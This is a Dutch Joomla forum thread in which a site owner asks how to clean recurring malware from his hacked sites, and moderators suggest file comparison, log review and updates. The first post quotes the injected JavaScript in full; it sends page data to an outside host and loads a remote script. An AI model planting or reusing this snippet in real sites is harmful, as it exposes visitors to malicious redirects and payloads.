Vermeld in iedere vraag duidelijk:
- De versie van Joomla! 3.X die je gebruikt
- De volledige url van je website indien mogelijk.
- De versie van de extensie waar de vraag over gaat.
sites gehackt
sites gehackt
30 nov 2015 14:46
Vorige week al melding hiervan gemaakt en dacht dat het opglost was. Nadat ik de hele vrijdag aan het zoeken ben geweest met de hoster naar waarom er zoveel emailverkeer is van twee door mij gebouwde sites kwamen wij er achter dat er een soort van mallware in zat.
de besmetten files (allemaal de index.PHP) van alle templates stond een stukje code in wat ik hieronder laat zien
Nadat ik deze rommel uit die files had gehaald stopte het mailverkeer. Heb vervolgens een nieuwe backup gemaakt en de wachtwoorden voor backend en ftp veranderd. Nu echter op zondag zijn alle twee de site weer vervuild met diezelfde soort code in de index.php van de templates. Ergens zal er wel een scriptje zitten wat zorgt dat dit telkens terug komt. Iemand enig idee waar ik dat zou kunnen vinden?
Gr
Hans
de besmetten files (allemaal de index.PHP) van alle templates stond een stukje code in wat ik hieronder laat zien
Code:
<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://www.fruticubaofmiami.com/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>
Gr
Hans
- vzodjoomla
- Heeft onderwerp gestart
- Bekend met Joomla!NL
- Berichten: 128
-
sites gehackt
30 nov 2015 14:54
Ik heb je andere
draadje
gesloten omdat crossposten hier verboden is. Maar zie mijn reactie #6 in dat draadje.
Groetjes, Astrid
Gebruik de zoekfunctie van dit forum voordat je een nieuwe vraag plaatst. Vragen uitsluitend via dit forum. yndi.nl - kvk 17157725 | Is je vraag beantwoord? Dan kan je het draadje zelf
sluiten
. Wil je Joomla!NL steunen? Dat kan met een donatie. |
- Astrid
- Moderator + Technisch team
- Berichten: 37437
sites gehackt
30 nov 2015 15:02
Sorry als dat verkeerd is gegaan, maar ik dacht toch echt dat ik een nieuw onderwerp had aangemaakt.
In dat draadje stel je voor om helemaal opnieuw te beginnen maar dat is eigenlijk geen optie. een van die twee sites zitten duizenden artikelen via VM. Is er dan geen mogelijkheid om een site te scannen en die meteen die rotzooi verwijderd?
De site waar VM in is geinstaleerd is een zakelijke de andere vrijwilligerswerk. Die wil ik eerst aanpakken. Dat helemaal opnieuw opbouwen kost veel te veel tijd. Straks raken meer sites besmet en dat wordt toch ondoenlijk op die manier. Telkens backups terug zetten die weer opnieuw besmet raken schiet niet echt op. Iemand een oplossing?
In dat draadje stel je voor om helemaal opnieuw te beginnen maar dat is eigenlijk geen optie. een van die twee sites zitten duizenden artikelen via VM. Is er dan geen mogelijkheid om een site te scannen en die meteen die rotzooi verwijderd?
De site waar VM in is geinstaleerd is een zakelijke de andere vrijwilligerswerk. Die wil ik eerst aanpakken. Dat helemaal opnieuw opbouwen kost veel te veel tijd. Straks raken meer sites besmet en dat wordt toch ondoenlijk op die manier. Telkens backups terug zetten die weer opnieuw besmet raken schiet niet echt op. Iemand een oplossing?
- vzodjoomla
- Heeft onderwerp gestart
- Bekend met Joomla!NL
- Berichten: 128
-
sites gehackt
30 nov 2015 15:08
Ja, je hebt nu een nieuw onderwerp aangemaakt voor een vraag die al liep en waar je dus niet meer teruggekoppeld hebt.
Je kunt ze op laten schonen door myjoomla of sucuri .
Of mijn advies in dit draadje volgen.
Je kunt ze op laten schonen door myjoomla of sucuri .
Of mijn advies in dit draadje volgen.
Groetjes, Astrid
Gebruik de zoekfunctie van dit forum voordat je een nieuwe vraag plaatst. Vragen uitsluitend via dit forum. yndi.nl - kvk 17157725 | Is je vraag beantwoord? Dan kan je het draadje zelf
sluiten
. Wil je Joomla!NL steunen? Dat kan met een donatie. |
- Astrid
- Moderator + Technisch team
- Berichten: 37437
sites gehackt
30 nov 2015 16:07 - 30 nov 2015 16:08
Of je doet het zelf. In 99% van de gevallen zit de besmetting in de bestanden en niet in de database. Ga als volgt te werk:
- Plaats een backup van je besmetten site in een map (bv oud) op je bureaublad.
- Plaats een backup van een schone installatie inclusief alle geinstalleerde extensies in een andere map (bv nieuw) op je bureaublad
- Download WinMerge en installeer dit op je PC.
- Vergelijk de mappen met WinMerge met elkaar en los de problemen die je tegenkomt stuk voor stuk op.
Succes!
- Plaats een backup van je besmetten site in een map (bv oud) op je bureaublad.
- Plaats een backup van een schone installatie inclusief alle geinstalleerde extensies in een andere map (bv nieuw) op je bureaublad
- Download WinMerge en installeer dit op je PC.
- Vergelijk de mappen met WinMerge met elkaar en los de problemen die je tegenkomt stuk voor stuk op.
Succes!
- Otto
- Bezoeker
sites gehackt
30 nov 2015 16:12
Hoi Otto,
Dat zou een idee zijn maar dat programma is er alleen voor windows, is er zoiets ook voor mac?
Dat zou een idee zijn maar dat programma is er alleen voor windows, is er zoiets ook voor mac?
- vzodjoomla
- Heeft onderwerp gestart
- Bekend met Joomla!NL
- Berichten: 128
-
sites gehackt
30 nov 2015 16:24 - 30 nov 2015 16:24
Hoi Hans,
Voor Apple kun je FileMerge gebruiken.
'Quick and dirty' is ook even het Apache log van je server downloaden, in Excel openen en kijken naar alle POST entries.
Vaak worden de besmette bestanden aangeroepen op deze manier. Dit is echter geen 100% garantie.
Voor Apple kun je FileMerge gebruiken.
'Quick and dirty' is ook even het Apache log van je server downloaden, in Excel openen en kijken naar alle POST entries.
Vaak worden de besmette bestanden aangeroepen op deze manier. Dit is echter geen 100% garantie.
- Otto
- Bezoeker
sites gehackt
04 dec 2015 17:24
Hoi Allemaal,
Ik heb op een gehackte site RSFirewall geinstaleerd en die heeft wat rare dingen ontdekt wat misschien wel de oorzaak van het telkens opnieuw besmetten van de templates tot gevolg had. Heeft iemand enig idee van de file license.php in de root van een joomlasite te maken heeft, volgens mij is dat een bestandje wat helemaal niet thuis hoort in de root. Ik ga dat bestand in ieder geval even hernoemen en kijken wat het resultaat is. Graag jullie reactie.
Alvast bedankt
Hans
Ik heb op een gehackte site RSFirewall geinstaleerd en die heeft wat rare dingen ontdekt wat misschien wel de oorzaak van het telkens opnieuw besmetten van de templates tot gevolg had. Heeft iemand enig idee van de file license.php in de root van een joomlasite te maken heeft, volgens mij is dat een bestandje wat helemaal niet thuis hoort in de root. Ik ga dat bestand in ieder geval even hernoemen en kijken wat het resultaat is. Graag jullie reactie.
Alvast bedankt
Hans
- vzodjoomla
- Heeft onderwerp gestart
- Bekend met Joomla!NL
- Berichten: 128
-
sites gehackt
04 dec 2015 18:46
Licence.php hoort daar inderdaad niet. Wel LICENCE.TXT
Maar die vraag had je ook zelf kunnen beantwoorden door even een schone installatie ergens te plaatsen en te ontdekken dat het php-bestand er niet hoort.
Maar die vraag had je ook zelf kunnen beantwoorden door even een schone installatie ergens te plaatsen en te ontdekken dat het php-bestand er niet hoort.
Met vriendelijke groet,
Wouter Compactweb.nl
Wouter Compactweb.nl
Voordat je een vraag post, gebruik eerst de zoekfunctie van ons forum. |
- WoodyF4u
- Moderator + Nieuwsteam
- Berichten: 11277
sites gehackt
11 dec 2015 21:13
Het heeft even geduurd maar ik denk dat ik de oplossing gevonden heb.
Het voert te ver om op dit forum hier helemaal verslag van te doen, maar het komt er in het kort op neer dat alleen die files verwijderen die besmet zijn niet afdoende is. Ze zullen terug keren na een paar dagen is mijn ervaring. De IP adressen moeten geblokt worden met een firewall. Op mijn site: www.hansnl.nl/joomlasites-bouwen-onderho...site-gehacked-hacked
Heb ik mijn ervaringen van de afgelopen dagen geschreven.
Dank aan alle meedenkers
Het voert te ver om op dit forum hier helemaal verslag van te doen, maar het komt er in het kort op neer dat alleen die files verwijderen die besmet zijn niet afdoende is. Ze zullen terug keren na een paar dagen is mijn ervaring. De IP adressen moeten geblokt worden met een firewall. Op mijn site: www.hansnl.nl/joomlasites-bouwen-onderho...site-gehacked-hacked
Heb ik mijn ervaringen van de afgelopen dagen geschreven.
Dank aan alle meedenkers
- vzodjoomla
- Heeft onderwerp gestart
- Bekend met Joomla!NL
- Berichten: 128
-
sites gehackt
11 dec 2015 21:20
Toch kan je er op wachten dat het weer mis gaat zolang je niet je sites up-to-date houd.
Je draait nog steeds op de onveilige versie van joomla!!
Je draait nog steeds op de onveilige versie van joomla!!
GNU General Public License version 2 or later; see LICENSE.txt</license><version>3.4.4</version>
Groeten, Jelle
Voordat je een vraag post, gebruik eerst de zoekfunctie van ons forum eens. Vragen uitsluitend via dit Forum. | Is je vraag opgelost? Dan kan je hem zelf
sluiten
. Wil je Joomla!NL steunen? Dat kan met een donatie. |
- Jelle
- Algemeen Moderator
- Berichten: 13625
sites gehackt
11 dec 2015 21:26
Hoi Jelle,
Ja dat klopt, die site waar mijn verslagje op staat moet nog worden geupdated. Maar dat is gelukkig niet de site waar ik het over heb. die zijn inmiddels wel up to date. Maar ook dan blijven de hackers het proberen. Gezien het feit dat de firewall dit tegen houd moet je constant de zaken in de gaten houden.
Met mijn 20 sites voor verenigingen heb ik hier op dit moment mijn handen aan vol.
GR
Hans
Ja dat klopt, die site waar mijn verslagje op staat moet nog worden geupdated. Maar dat is gelukkig niet de site waar ik het over heb. die zijn inmiddels wel up to date. Maar ook dan blijven de hackers het proberen. Gezien het feit dat de firewall dit tegen houd moet je constant de zaken in de gaten houden.
Met mijn 20 sites voor verenigingen heb ik hier op dit moment mijn handen aan vol.
GR
Hans
- vzodjoomla
- Heeft onderwerp gestart
- Bekend met Joomla!NL
- Berichten: 128
-
Tijd voor maken pagina: 0.776 seconden